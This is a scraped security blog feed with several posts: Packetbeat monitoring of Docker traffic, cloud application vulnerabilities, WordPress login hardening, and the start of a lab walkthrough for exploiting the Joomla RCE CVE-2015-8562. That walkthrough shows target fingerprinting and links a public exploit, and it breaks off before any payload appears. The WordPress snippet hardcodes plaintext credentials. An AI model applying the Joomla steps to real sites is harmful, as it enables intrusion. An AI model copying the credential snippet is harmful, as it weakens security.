<span style="font-family: Courier New;"># curl -XGET ‘<a href="http://localhost:9200/packetbeat-*/_search?pretty">http://localhost:9200/packetbeat-*/_search?pretty</a>‘<br />
</span><br />
By navigating through the website, all the HTTP queries will be gathered by Packetbeat and stored in Elasticsearch.<br />
<h1>
Viewing Analyzed Data through Kibana Graphs</h1>
The exposed RESTful API interface is great, but fails to provide a
quick and nice-looking way of presenting what is happening in our
network. To solve that, we can use Kibana, where dashboards can be
instantiated in order to see the gathered data quickly and instantly
tell what is happening on our network.<br />
First, we must go to “Settings – Indices,” where new indices will be shown as below.<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/122115_2337_DeepPacketI6.png" /></div>
Back in the “Discover” tab, we can select the index pattern we would
like to use by selecting it from the drop-down menu. Each data entry
stored in Elasticsearch has an index pattern that identifies the
Elasticsearch indices we would like to explore. To display all indices
defined by Elasticsearch, we can run the following command:<br />
<span style="font-family: Courier New;"># curl ‘localhost:9200/_cat/indices?v’<br />
</span><br />
Note that in Discover tab, we can select the index pattern “packetbeat-” in a drop-down list to view the gathered data.<br />
<img align="middle" alt="" class="aligncenter" height="278" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/122115_2337_DeepPacketI7.png" width="642" /><br />
To install the dashboards from the <a href="https://github.com/elastic/beats-dashboards">beats-dashboards</a> Github repository, we can simply clone the repository and run the “./load.sh <a href="http://localhost:9200/">http://localhost:9200</a>”
command to load the dashboards (this is already done by the docker
images presented in the previous section, so there’s no need to do it
again). Then, back in Kibana, we can go to “Dashboard – Load Saved
Dashboard” to see newly added dashboards, as shown below.<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/122115_2337_DeepPacketI8.png" /></div>
If we click on the HTTP dashboard, we can see that a new dashboard
will open, which also contains the navigation page, where we can select
different dashboards directly. At this time, there is no data present in
the Kibana interface, as is shown below.<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/122115_2337_DeepPacketI9.png" /></div>
Now we have to test two use-case scenarios. First we have to visit
the website from outside of the Docker infrastructure, which can be
easily achieved by visiting the website from another machine altogether.
After doing that, we can go to the Kibana interface to see whether
Packetbeat has gathered any HTTP requests in the last couple of
minutes—we can indeed see that there are 10 requests present in the
interface. This verifies that Packetbeat is able to sniff the packets
coming from the Internet to a Docker container.<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/122115_2337_DeepPacketI10.png" /><a href="https://www.blogger.com/null" name="resume"></a></div>
We also have to verify that Packetbeat can monitor requests coming
from another Docker container running on the same physical host. But
instead of specifying the external IP address, we’ll rather specify the
internal IP address of the container. Basically, we have to run “docker
exec -it ID /bin/bash” and execute the ifconfig command in the Docker
container running Nginx to discover the internal IP address of that
container. Then we have to issue the same command to gain command-line
interface to some other container running on the same host and executing
the “curl <a href="http://172.17.0.11/">http://172.17.0.11/</a>”
command to download the website HTML source code. Note that curl is not
capable of parsing the returned website HTML, so no additional requests
for images, JavaScript/CSS files will be made, which means only one
request will be generated.<br />
If we set the timer in Kibana web interface to the last number of
minutes (1 minute is good enough) where no requests have been generated,
the counter of requests will again be back to zero. Then we can issue
the curl command, which will generate 1 request as shown below.<br />
<div style="text-align: center;">
</div>
<div style="text-align: center;">
</div>
If we view the details of a request in the “Discover” tab, the
following information is available (note that only the most useful
fields are shown in the picture below), where we can see that a “GET /”
request was generated from IP address 172.17.0.1 to IP address
172.17.0.11 (where our website is present in the nginx Docker
container). The GET response returned a HTTP status code 200, which
contained 10554 bytes of data.<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/122115_2337_DeepPacketI12.png" /></div>
<h1>
Conclusion</h1>
In this article we’ve seen that we can gather a lot of useful
information about packets flowing to and from our Docker container,
which can be beneficial to discover any anomalies that can be further
analyzed for potential threats.<br />
This exercise proved that we can use Packetbeat for our defense,
because of its capabilities to sniff traffic from Docker containers.
Note that many cloud-based applications are running in Docker
containers, so sniffing the packets to analyze them or possibly pipe
them to an IDS/IPS proves beneficial to discover malicious traffic and
block the attacker as soon as possible.<br />
<h1>
References</h1>
[1] Network configuration, <a href="https://docs.docker.com/articles/networking/">https://docs.docker.com/articles/networking/</a> .<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/122115_2337_DeepPacketI11.png" /></div>
</div>
Anonymoushttp://www.blogger.com/profile/14161834164641471363noreply@blogger.com0tag:blogger.com,1999:blog-185877282583432766.post-82750430532527101962015-12-31T14:09:00.001+05:302015-12-31T14:17:17.358+05:30Security Vulnerabilities in Cloud Applications<div dir="ltr" style="text-align: left;" trbidi="on">
<h1>
</h1>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://www.smartdatacollective.com/sites/smartdatacollective.com/files/cloud-computing_0.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://www.smartdatacollective.com/sites/smartdatacollective.com/files/cloud-computing_0.jpg" height="333" width="400" /></a></div>
<h1>
</h1>
There are a number of cloud-based applications that we use every day,
without even thinking about it; the email service, search engines,
websites, even our bank application. While some might not categorize the
security of their cloud application as important, we beg to differ,
since we as users would like to have our personal information secured.
For example, imagine an online fitness application that we can log in to
in order to view our visits to the gym, our subscription details as
well as our personal information like name, surname, and home address.
This all sounds great, but how can it implicate the security?<br />
Let’s assume we’re the user of such cloud-based application, but in
our free time, we like to learn about IT security, which gives us enough
knowledge to gain access to the personal information of other users.
Let alone the fact that a malicious attacker might get access to the
backend database, where the application supposedly stores passwords,
which are not encrypted, but in plaintext. In such circumstances, the
hacker will have access to your password and will be able to log into
the cloud application in your name; not only that, he might be able to
access other websites, where the authentication success will depend upon
the user using the same password for other applications. Let’s take a
step back and think about the initial statement that security is not
important for their business; it might not be, but, because of your
application security vulnerabilities, personal information (or even
personal identity) of your users might be compromised, which might have
terrifying consequences on your user’s lives.<br />
<h1>
Internet of Things (IoT)</h1>
Cloud-based applications normally run in the cloud, but are accessed
by the users via different means. Cloud-based web applications
immediately come to mind, which have been at the forefront for the last
decade or so. They are also understood by most security professionals,
since they have been most widely researched and analyzed in the past.
This is due to the factor that personal computers are widely used by the
people worldwide, but the trend is shifting to smaller devices, like
smart phones, smart glasses, smart watches, smart embedded devices, etc.
Basically, a lot of ordinary devices are now becoming smart devices,
which have connectivity to the Internet, thus laying the foundations of
the Internet of things (IoT).<br />
While many companies are striving to make their devices (whatever
they might be) smart and connect it to the Internet, there are many
security-related issues that we must take into consideration before we
hastily rush into buying every smart device. If we think about it, all
of the smart devices, including the now old-fashioned personal computer,
will sooner or later use at least one cloud-based application, when the
connection to the Internet is established. When a web browser is
connecting to a web page, it’s actually talking to the server that can
be anywhere in the world. The same is true for mobile applications and
other applications requiring Internet access regardless of where they
are running, whether they are running on a personal computer, mobile
device or a smart watch.<br />
<a href="https://www.blogger.com/null" name="resume"></a>If written correctly, the cloud-based
applications are programmed once and can be used by corresponding client
application counterparts running on any device. We can connect to a
cloud chat application via a browser extension or from a specifically
written custom mobile application, but the cloud application remains the
same. Therefore, it’s self-evident that, since the cloud application is
the same, it must contain the same vulnerabilities, no matter how we
interact with it. This brings us to the conclusion that finding and
exploiting vulnerabilities in cloud-based applications can be done from
any device, either from a personal computer or from a mobile phone or
any other device, for that matter. The only things that change are tools
and techniques available on a device from where we would like to
interact with a cloud-based application. While there are many tools
available for personal computers, which is only natural, since it’s been
with us the longest, we can also search for the same vulnerabilities
from our smart phones, but with a somewhat limited number of tools
available.<br />
It’s also worth mentioning that, leaving aside the protocols,
frameworks, or the programming languages used to run the cloud-based
application, the basic types of vulnerabilities remain the same, even
though they might be named differently. For example, let’s take a look
at session fixation vulnerability: When interacting with our bank
application from a personal computer, we usually require a certificate
and a password, which is given to the web browser, which authenticates
us; the same is true for mobile devices, where the authentication
secrets are taken by a specifically written mobile application to
authenticate us to the bank application. What both approaches have in
common is that if the cloud-based application contains a session
fixation vulnerability, we can preset a specific session token of a
user, where the client application validates it and consequently
authenticates the user. It goes without saying that a session token can
be anything and is dependent upon the type of application, but the
principle behind it remains the same: A user has some kind of a token,
which was validated by the application and can be used by attacker to
access the cloud-based application in the name of the user.<br />
We might also emphasize that there exist many vulnerabilities
specific to the client that have little to do with the cloud-based
applications. Those vulnerabilities are present only in certain hardware
devices, operating systems, applications, application configurations,
etc. Those kinds of vulnerabilities will not be described here.<br />
<h1>
Types of Vulnerabilities</h1>
Now that we’ve laid the groundwork for the basis of this article, we
can describe the types of vulnerabilities present in cloud-based
applications. We’ve already shown that the basic types of
vulnerabilities remain the same, regardless of the internals of the
cloud-based applications, which is why we can start from OWASP Top 10
[2] and provide basic descriptions of the most prevalent cloud-based
application vulnerabilities.<br />
<ul>
<li><b>Server-side injection:</b> A hacker can inject his own
logic into the application’s backend to get access to sensitive
information. A cloud-based application can store a lot of information
about users, where an attacker might be able to access not only his own
information, but the information of other users as well.</li>
<li><b>Client-side injection:</b> In a server-side injection,
an attacker injects additional instructions to be executed on the
server; in client-side injection he injects the instructions to the
server, but they are replayed back to the client to be executed by the
client application. This is usually because of an XSS vulnerability in a
web application, where a hacker sends a link to the user, who clicks on
the link, after which the additional code is executed in the user’s web
browser.</li>
<li><b>Session management:</b> If a cloud-based application
provides authenticated access to users, the user can log in to the
application via his credentials. It’s up to the application to provide a
secure communication channel (HTTPS) from the client’s application to
the cloud-based application. If applicable and where the utmost security
is desired, a service can also provide certificate-pinning.</li>
<li><b>Exposure of sensitive data:</b> Many cloud-based
applications allow you to save data in the cloud, ranging from less to
more sensitive information. If storing high-priority sensitive
information in the cloud, we have to ensure the data in the cloud is
properly encrypted, which can only be secure if the encryption and
decryption happens on the client side, prior to sending anything to the
cloud.</li>
<li><b>Logical mistakes:</b> Many applications that allow
authenticated access actually provide limited access to data stored in
the cloud. But the application shouldn’t rely only on a user’s session
to give access to the data; it should have proper access controls in
place to check whether the data being accessed actually belongs to that
user. This can often be exploited by authenticating to the application
and changing the ID of the arbitrary element to access the element of
other users, where the element can be a document, an email, personal
information, etc.</li>
</ul>
<br />
<ul>
<li><b>Vulnerable libraries:</b> Many applications use
third-party libraries and framework to set the grounds on which they
build their own application. While there’s nothing wrong with that
approach, we have to make sure the libraries are updated and their
functionalities are not exposed to the Internet: only the application
functionality should be accessible.</li>
</ul>
<h1>
Conclusion</h1>
In this article, we’ve explained the concept of a cloud-based
application and how client applications communicate with them to do
something useful. There are many different devices, such as personal
computers, smart phones, smart watches, and any Internet-capable device
that communicates with the cloud-based applications via different means.
While the means of interaction can differ greatly, the vulnerabilities
in cloud-based applications remain the same, but their discovery largely
depends upon the client-side technology used.<br />
When testing a cloud-based application for security vulnerabilities
that can only be interacted with through a smart phone, whether an
Android or an iOS, the vulnerabilities in that cloud-based application
are similar. You as a penetration tester or a security consultant have
to keep in mind that the security vulnerabilities in such an application
are not different, they are not harder, or even impossible to find, but
they are the same as if the application provided a web-based interface
to interact with its functionalities.<br />
We have to keep that in mind in order to test for security
vulnerabilities of non-typical cloud-based applications. For example, a
cloud-based application providing input fields to invoke certain
functionality, like sending an email to another user, has to have some
kind of verification to prove the user is a human, like a captcha.
Otherwise, a hacker could write a small program to invoke this
functionality over and over and send millions of emails per day. In case
a mail service like <a href="https://www.mailgun.com/">MailGun</a>
is used to send and receive emails through a simple API, the owner of
the cloud-based application will have to pay for all of the emails send
by the hacker. Now, this could be a critical vulnerability, but can be
easily prevented with an implementation of a captcha mechanism to prove
to the application that you are indeed a human; this is practically
self-evident when looking at a web application and almost any security
professional will identify and report it to their customer.<br />
The problem arises with a mobile application, which could implement
the same input fields without the captcha mechanism, because it isn’t
customary for a user on a mobile device to fill out any captcha forms.
Remember that captchas were also not used back in the early days of
world-wide web, but have now become an essential part of many web
applications to enhance security. To make matters worse, many developers
don’t even realize that a hacker can intercept any network traffic and
replay it, even outside of the application, but if a mobile application
signs every request sent to the cloud-based application, a hacker can
also inject himself into the mobile application at runtime and send the
requests from inside the mobile application, which would sign every
request for him. Therefore, a cloud-based application should verify how
many requests have been sent from the same client, regardless of the
type of application being used, and after a number of consecutive
requests, ask the client application, a mobile application in this case,
to display a captcha to the user to fill out.<br />
We have to keep in mind that a hacker can control any client-based
application, regardless of whether they are running in his web browser
in the form of web application or in a mobile application. The
vulnerabilities in cloud-based applications are the same and can be
exploited form any client application, only the tools and techniques can
greatly differ.<br />
<ol>
<li>
<h2>
References</h2>
</li>
</ol>
[1] The top cloud computing threats and vulnerabilities in an enterprise environment: <a href="http://www.cloudcomputing-news.net/news/2014/nov/21/top-cloud-computing-threats-and-vulnerabilities-enterprise-environment/">http://www.cloudcomputing-news.net/news/2014/nov/21/top-cloud-computing-threats-and-vulnerabilities-enterprise-environment/</a><br />
[2] Top 10 2013-Top 10: <a href="https://www.owasp.org/index.php/Top_10_2013-Top_10">https://www.owasp.org/index.php/Top_10_2013-Top_10</a></div>
Anonymoushttp://www.blogger.com/profile/14161834164641471363noreply@blogger.com0tag:blogger.com,1999:blog-185877282583432766.post-23486361645045086842015-12-31T13:58:00.000+05:302015-12-31T13:58:41.594+05:30Securing Your WordPress Admin Panel<div dir="ltr" style="text-align: left;" trbidi="on">
Today, anyone can create their own website with tools such as
WordPress, Joomla or Drupal. However, many people suffer when they do
not take precautions to secure those installations. If you look at the
jobs in a freelancing website, it is likely that you will see job offers
of people telling that their WordPress website was hacked and
requesting help to solve the issue.<br />
Below, we will examine how you can secure your WordPress Admin Panel
and its associated Login Page. We will start by discussing usernames and
passwords and move to enabling account lockouts, serving the login page
over SSL, adding a CAPTCHA in the login page, whitelisting IPs that
would be able to use the login page, hiding the login page and adding
extra layers of protection such as entering two different usernames and
passwords to be successfully logged in in your WordPress website.<br />
<h1>
Choose your usernames and passwords wisely, especially for the administrative account</h1>
If you are about to install WordPress, do not allow the default
administrative account to be called admin. This is the first username
all attackers try to exploit via brute-forcing, dictionary, or other
attacks.<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/120815_2259_SecuringYou1.png" /></div>
<div style="text-align: center;">
<span style="color: #44546a; font-size: 9pt;"><em>Figure 1: Setting up an administrative account in WordPress<br />
</em></span></div>
Even if you pick something slightly different such as <strong>iamadmin</strong>, it can save you a lot of trouble. When picking a password, be sure that WordPress deems it is <strong>strong.</strong> Observe the bar below the password and ensure it is green in color.<br />
You have to be aware that even if an attacker cannot gain financial
advantage from gaining administrative privileges in your website it does
not mean that he will not try to gain such privileges.<br />
Look at the figure below:<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/120815_2259_SecuringYou2.png" /></div>
<div style="text-align: center;">
<span style="color: #44546a; font-size: 9pt;"><em>Figure 2 A brute-force or dictionary attack against a WordPress site<br />
</em></span></div>
In the figure above, you can see an attack against the WordPress
admin panel. All lockouts have occurred on the same day and all targeted
a possible weak <strong>admin</strong> username. Dictionaries does not
contain that many words for the trial and error process to take that
long. So, if you are using the default <strong>admin</strong> user and have guessable passwords it is highly likely at some point to be hacked.<br />
<strong>This is so because WordPress does not ban attackers if they
attempt to log in unsuccessfully too many times which gives attackers
infinite time to try to log in as administrators.<br />
</strong><br />
This brings us to the next point.<br />
<h1>
Limit the number of login attempts that can be made from an IP for a specified period</h1>
If you do not limit the number of login attempts and lockout the IP
for a certain time period, attacker scripts can run forever until they
find the username and password they are looking for.<br />
A plugin that I like to use is <a href="https://wordpress.org/plugins/limit-login-attempts/">Limit Login Attempts</a>. It has not been updated in 4 years but it works with the latest WordPress version and it still does the job.<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/120815_2259_SecuringYou3.png" /></div>
<div style="text-align: center;">
<span style="color: #44546a; font-size: 9pt;"><em>Figure 3: Customizing the Limit Login Attempts plugin<br />
</em></span></div>
You can choose to log the IP address that failed logging in too many
times so you can investigate the attacks and possibly permanently
prohibit access to that IP address, you can set the plugin to send you
an email after an IP address’ login attempts result in a specified by
yourself lockouts and you can customize many other details of the
lockout process.<br />
I have disabled JavaScript and cookies to try out the plugin in the
way that automated cracking tools access web content and the plugin
works as expected.<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/120815_2259_SecuringYou4.png" /></div>
<div style="text-align: center;">
<span style="color: #44546a; font-size: 9pt;"><em>Figure 4: 1 login attempt remains until lockout<br />
</em></span></div>
After the lockout, even if I type the correct credentials I will not
be able to log in which leaves attackers in the dark as they will not be
able to know if the username/password combination they are trying is
valid or invalid.<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/120815_2259_SecuringYou5.png" /></div>
<div style="text-align: center;">
<span style="color: #44546a; font-size: 9pt;"><em>Figure 5:Lockout prevents us to log in even with the right credentials<br />
</em></span></div>
<h1>
Force SSL login to prevent Man-in-the-Middle Attacks</h1>
No matter if you have multiple users writing or editing your
WordPress website there are times when you need to log in to WordPress
from a public computer, from a public Wi-Fi or other Internet network.
Doing this makes you vulnerable to Man-in-the-Middle attacks. Basically,
attackers can listen to the traffic in that network and capture your
HTTP request to the WordPress admin panel where you are trying to log in
and see the credentials you are using in plaintext. To prevent this,
you can use SSL when authenticating yourself or your other users in
WordPress. To do this, your page has to be accessible over <strong>https. </strong> You can test whether that is the case by prepending https to your page, like <em>https://example.com</em>. If you get an error, then you have to buy a SSL certificate and set up your web server appropriately.<br />
But if your website is already accessible over https, you can open your <strong><em>wp-config.php</em></strong>
file (it is located in the root directory of your WordPress website),
edit it with your favorite editor and add the following lines to the
file:<br />
<span style="font-family: Courier New;">// use ssl (https) for the login page<br />
define(‘FORCE_SSL_LOGIN’, true);<br />
//use ssl (https) for the whole admin area<br />
define(‘FORCE_SSL_ADMIN’, true);<br />
</span><br />
The <strong>FORCE_SSL_LOGIN</strong> constant would redirect and allow only <em>https</em> to be used when attempting to log in. The <strong><em>FORCE_SSL_ADMIN </em></strong>constant would enforce secure connection throughout the entire admin panel/area.<br />
If you enable one of those, you would always be redirected to <strong>https</strong> when attempting to log in which will limit the possibilities of someone sniffing your traffic.<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/120815_2259_SecuringYou6.png" /></div>
<div style="text-align: center;">
<span style="color: #44546a; font-size: 9pt;"><em>Figure 6: If you do not have a SSL certificate or the server is not configured properly you will get a similar error message<br />
</em></span></div>
<h1>
Implement a CAPTCHA in the login page</h1>
Implementing a CAPTCHA in the login page can minimize hacking
attempts by prohibiting automated scripts from trying to brute-force or
performing other attacks on your login page without first being able to
solve the problem posed by the CAPTCHA. If you simply open the WordPress
admin panel and click on <strong><em>Plugins -> Add New</em></strong>, then type <em>captcha</em> you will be presented with many plugins to choose from.<br />
Let us look at one of the possible plugins. <a href="https://wordpress.org/plugins/captcha/">Captcha by BestWebSoft</a>
is installed more than 300,000 times and has a good rating (4.5/5).
When installed, it creates a new item in your admin menu where you can
customize it. It is possible to use it for your login page, your reset
password page and of course it may turn useful for comments and user
registrations, if they are enabled. You can whitelist IPs which would
not have to solve the CAPTCHA and you can customize the messages related
to the CAPTCHA such as the message being shown when a user fills the
captcha field incorrectly. You can also pinpoint whether you want the
CAPTCHA to include both words and numbers or only one of those.<br />
If you simply activate it after the installation, you would have a
login form with a CAPTCHA. If the person does not fill the CAPTCHA
properly he cannot know if a username/password combination is valid or
invalid.<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/120815_2259_SecuringYou7.png" /></div>
Figure 7: A CAPTCHA on the WP Login Page<br />
<h1>
Allow only specific IPs to log in</h1>
If you have a static IP and know that that your IP would not change
frequently you can show the login page only if the user IP is some
whitelisted value using the .<strong>htaccess</strong> file in your <strong>wp-admin</strong> folder. Even if your IP changes, you would still be able to login by modifying the <strong>.htaccess</strong>
file to reflect the new IP address. You can allow numerous IP addresses
if you want to be able to log in from different networks and computers
or if you have other persons logging into WordPress.<br />
To do this, you would have to open a FTP connection to the server (or
access the files in any other way that suits you) and access the files
of your WordPress website. Then you open the <strong>wp-admin</strong> folder and create or edit a file inside it which has to be called <strong>.htaccess</strong> (no file name, just an extension) and add the following:<br />
<span style="font-family: Courier New;">order deny,allow<br />
# Replace 99.99.99.99 with the desired IP address<br />
allow from 99.99.99.99<br />
#allow more IP addresses to access the wp-admin area by uncommenting the line below and editing the IP address<br />
#allow from 98.98.98.98<br />
deny from all<br />
</span><br />
After the <strong>allow from</strong> keywords, you can add the
proper IP address which would be able to login into WordPress. If you
want multiple IP addresses, you just copy the allow from <strong>99.99.99.99</strong> line and edit the IP address value.<br />
After you have set up the .htaccess file, users with different than
the whitelisted IP addresses would not be able neither to open the login
page, nor to use the admin panel.<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/120815_2259_SecuringYou8.png" /></div>
<div style="text-align: center;">
<span style="color: #44546a; font-size: 9pt;"><em>Figure 8: I do not have an allowed IP address and cannot administrate or view the login page<br />
</em></span></div>
<h1>
Obfuscate your admin area</h1>
If you really feel like the above is not enough, you can try to
obfuscate your admin area. You can rename the default URL of the login
page to be something different than the default URL of the login page.
With the defaults, you can access the login page with <strong>example.com/admin</strong>, <strong>example.com/wp-admin </strong>or <strong>example.com/wp-login.php</strong>. To do this, you can use several plugins. We have chosen to show one of those plugins called <a href="https://wordpress.org/plugins/wps-hide-login/">WPS Hide Login</a><strong>. </strong>Once activated, it creates additional settings in the <strong>Settings -> General </strong>admin
menu in which you can select an URL that will be used for logging in.
Users attempting to log in with the traditional URLs will be redirected
to the homepage.<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/120815_2259_SecuringYou9.png" /></div>
<span style="color: #44546a; font-size: 9pt;"><em>Figure 9: Setting up a new login page with the WPS Hide Login plugin.</em></span>Although attackers can still brute-force, guess or social engineer
the URL to your admin page it can be a bit discouraging trying to figure
out where it is and it will take an extra effort that many may not find
worth it.<br />
<h1>
Adding extra layers of protection to the Login page or enabling Two-Factor Authentication</h1>
To make the login page more secure, you can choose to add an extra
layer of protection to it such as users having first to provide
credentials using HTTP Basic Auth in order to view the login page itself
and login as a user. If you choose <strong>Two-Factor Authentication</strong> there are many plugins to choose from which will do the job.<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/120815_2259_SecuringYou10.png" /></div>
<div style="text-align: center;">
<span style="color: #44546a; font-size: 9pt;"><em>Figure 10: Some of the plugins allowing 2FA in WP<br />
</em></span></div>
If you are not into that and do not feel that your website is so
important to require 2FA you can just add another layer of protection to
your website. The simplest way would be to edit the <strong>wp-login.php</strong> file located in your website’s root and add the following in the top of the file:<br />
<span style="font-family: Courier New;">/** HTTP Basic Auth **/<br />
if (!isset($_SERVER[‘PHP_AUTH_USER’])) {<br />
header(‘WWW-Authenticate: Basic realm=”WordPress”‘);<br />
header(‘HTTP/1.0 401 Unauthorized’);<br />
echo ‘You need proper credentials to view this page’;<br />
exit;<br />
} else {<br />
$users = array(‘iamadmin’ => ‘iamtheadmin’, ‘johny’ => ‘bravo’);<br />
if (!array_key_exists($_SERVER[“PHP_AUTH_USER”], $users) || $users[$_SERVER[“PHP_AUTH_USER”]] !== $_SERVER[‘PHP_AUTH_PW’]) {<br />
echo “Wrong credentials!”;<br />
exit;<br />
}</span><br />
}<br />
The code snippet above hardcodes some usernames and passwords which
can be used to see the login page and reveals the login page only if the
user has entered one of the two (you can edit them) user/password
combinations in the <em>$users</em> array. The snippet shows the HTTP
Basic Auth credentials box only once per user session (if the user types
the wrong username/password combination he would have to close his
browser and open it again) but this could easily be changed by adding
the two lines mentioned below in the <strong><em>else</em></strong> conditional:<br />
<span style="font-family: Courier New;">header(‘WWW-Authenticate: Basic realm=”WordPress”‘);<br />
header(‘HTTP/1.0 401 Unauthorized’);<br />
</span><br />
The problem with inserting the above snippet in the <strong>wp-login.php</strong>
is that your changes may get lost when you install an update.
Therefore, it would be best to create your own login page and use
WordPress’ global <em>wp_login_form()</em> function to show the login
form in it. There, you can add HTTP Basic Auth at your leisure. Another
way to implement HTTP Basic Auth (without hardcoding credentials in the
code) but by editing the <strong>.htaccess</strong> file and adding a <strong>.pwd</strong> file with the possible user credentials in your web server can be seen here: <a href="http://www.helpdeskhangouts.com/securing-wordpress-admin-basic-http-authentication/">http://www.helpdeskhangouts.com/securing-wordpress-admin-basic-http-authentication/</a><br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/120815_2259_SecuringYou11.png" /></div>
<div style="text-align: center;">
<span style="color: #44546a; font-size: 9pt;"><em>Figure 11: We will be shown the WP Login Page only after we provide correct credentials to HTTP Basic Auth<br />
</em></span></div>
<h1>
Conclusion</h1>
As WordPress is so easy to use, many people forget that extra layers
of protection are required in order for their WordPress installation to
live a long and fruitful life. Attacks against the admin section of
WordPress are very common and unless precautions are taken, you may
become a victim too. There are many ways to protect the login page and
you should use several of them to increase the resilience of your
WordPress installation.</div>
Anonymoushttp://www.blogger.com/profile/14161834164641471363noreply@blogger.com0tag:blogger.com,1999:blog-185877282583432766.post-65693688219624488922015-12-31T13:46:00.000+05:302015-12-31T13:52:13.234+05:30Exploiting JOOMLA RCE CVE-2015-8562<div dir="ltr" style="text-align: left;" trbidi="on">
<h1>
Introduction:</h1>
A critical remote code execution(RCE) vulnerability was discovered in
Joomla! websites. This is making a lot of noise because of the
following reasons.<br />
<ol>
<li>It appears that attackers started exploiting this even before the disclosure(0-day).</li>
<li>It is very easy to exploit this vulnerability.</li>
<li>Almost all the versions of Joomla are vulnerable under with certain conditions.</li>
</ol>
<h2>
What is this vulnerability?</h2>
At its core, this is an input validation issue. An attacker can
inject arbitrary input using the X-FORWARDED-FOR or User-Agent header to
achieve code execution. Detailed analysis has already been covered <a href="https://blog.sucuri.net/2015/12/joomla-remote-code-execution-the-details.html">here</a>, so let’s not re-invent the wheel.<br />
<h2>
Who is vulnerable?</h2>
All versions of the Joomla! below 3.4.6 are known to be vulnerable.
But exploitation is possible with PHP versions below 5.5.29, 5.6.13 and
below 5.5.<br />
<h1>
Lab Setup:</h1>
I have created a VM for the readers to get hands on experience while reading this article. It can be downloaded from this <a href="https://www.dropbox.com/s/2ndalmtr2i4788j/Joomla_VM.ova?oref=e&n=85817648">link</a>. So, if you want to get the taste of exploiting this vulnerability, download this VM before you proceed further.<br />
Login credentials for the VM are as shown below.<br />
Username: joomla<br />
Password: joomla<br />
The application is hosted at http://<ip address>/joomla/<br />
Kali Linux is the attacker’s machine.<br />
<h1>
Information Gathering:</h1>
Let’s gather some information about the target as we do in a typical black box pentest.<br />
The default Joomla! Installations come with an administrator control panel at /<b>administrator</b>/ path.<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/122115_1317_ExploitingC1.png" /><span style="background-color: #fdfdfd;"><br />
</span></div>
This confirms that the target is running Joomla!. We can also find
Joomla! installations using other ways but I am leaving them to you.<br />
<h1>
Finding out the Joomla version:</h1>
One of the common ways to find Joomla! version is to check “/language/en-GB/en-GB.xml” file.<br />
Let’s do it.<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/122115_1317_ExploitingC2.png" /><span style="background-color: #fdfdfd; font-family: Arial; font-size: 11pt;"><br />
</span></div>
The above figure shows the target version as 3.4.3<br />
Metasploit has got a scanner to find this. We can use that as well.<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/122115_1317_ExploitingC3.png" /><span style="background-color: #fdfdfd; font-family: Arial; font-size: 11pt;"><br />
</span></div>
The above figure shows the Metasploit’s Joomla! version scanner.<br />
<h1>
PHP Version:</h1>
Another important thing we need to remember here is the PHP version.
As mentioned earlier, exploitation is possible with PHP versions below
5.5.29, 5.6.13 and below 5.5.<br />
We can use <b>curl</b> to find the PHP version. Run the following command and observe the response headers.<br />
<span style="font-family: Courier New;">curl –v –X HEAD http://<ipaddress>/joomla/<br />
</span><br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/122115_1317_ExploitingC4.png" /></div>
The above figure shows the PHP version installed on the target box.
Well, we are on our way to exploit this box as the PHP version is
matching our requirement.<br />
<h1>
Exploitation:</h1>
As mentioned in the beginning, this vulnerability is being exploited
before it’s public disclosure. But, following is one of the first public
exploits available online to exploit this vulnerability.<br />
Download links:<br />
<a href="http://pastebin.com/PRiK0SWL">http://pastebin.com/PRiK0SWL</a><br />
(or)<br />
